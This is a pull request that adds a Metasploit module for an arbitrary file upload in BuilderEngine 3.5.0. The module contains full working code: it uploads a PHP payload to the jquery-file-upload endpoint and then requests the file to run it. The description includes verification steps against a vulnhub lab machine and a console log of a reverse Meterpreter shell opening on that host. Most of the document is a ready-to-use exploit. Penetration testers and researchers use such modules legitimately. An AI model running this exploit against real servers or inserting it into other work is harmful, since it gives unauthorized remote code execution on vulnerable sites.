### PR TITLE
BuilderEngine 3.5 Arbitrary file upload and execution exploit

### DIFF
--- a/modules/exploits/multi/http/builderengine_upload_exec.rb
+++ b/modules/exploits/multi/http/builderengine_upload_exec.rb
@@ -1,0 +1,110 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "BuilderEngine Arbitrary File Upload Vulnerability and execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in BuilderEngine 3.5.0
+        Remote Code Execution via elFinder 2.0, which
+        results in arbitrary code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'metanubix',   #PoC
+          'Marco Rivoli'  #Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', ''],
+          ['OSVDB', ''],
+          ['EDB', '40390'],
+          ['BID', '']
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['BuilderEngine 3.5.0', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 18 2016",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])
+        ])
+  end
+
+  def check
+    uri = target_uri.path
+    uri << '/' if uri[-1,1] != '/'
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')
+    })
+
+    if res and res.code == 200 and res.body.empty?
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    uri = target_uri.path
+
+    peer = "#{rhost}:#{rport}"
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+    data = Rex::MIME::Message.new
+    payload_encoded = Rex::Text.rand_text_alpha(1)
+    payload_encoded << "<?php "
+    payload_encoded << payload.encoded
+    payload_encoded << " ?>\r\n"
+    data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(uri,'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res
+      if res.code == 200 && res.body =~ /files|#{php_pagename}/
+        print_good("Our payload is at: #{php_pagename}. Calling payload...")
+        register_file_for_cleanup(php_pagename)
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'ERROR')
+    end
+
+    print_status("Calling payload...")
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(uri,'files/', php_pagename)
+    )
+  end
+end


### PR DESCRIPTION
Add BuilderEngine 3.5.0 - Arbitrary File Upload and execution module.

## Verification

- Exploit-DB: https://www.exploit-db.com/exploits/40390/
- Install the vulnerable app from the exploit db page (https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip) or test it with the vulnhub ctf machine sedna (https://www.vulnhub.com/entry/hackfest2016-sedna,181/ it has the application installed on apache instance on port 80)

- [x] Start `msfconsole`
```bash
msf > use exploit/multi/http/builderengine_upload_exec 
msf exploit(builderengine_upload_exec) > set RHOST 192.168.1.169
RHOST => 192.168.1.169
msf exploit(builderengine_upload_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.141:4444 
[+] Our payload is at: vvGILYZlTtXQZ.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.169
[*] Meterpreter session 1 opened (192.168.1.141:4444 -> 192.168.1.169:48634) at 2017-05-12 18:30:27 +0200
[+] Deleted vvGILYZlTtXQZ.php

meterpreter > sysinfo 
Computer    : Sedna
OS          : Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.169 - Meterpreter session 1 closed.  Reason: User exit
[*] 192.168.1.169 - Meterpreter session 1 closed.  Reason: Died
msf exploit(builderengine_upload_exec) > exit
```
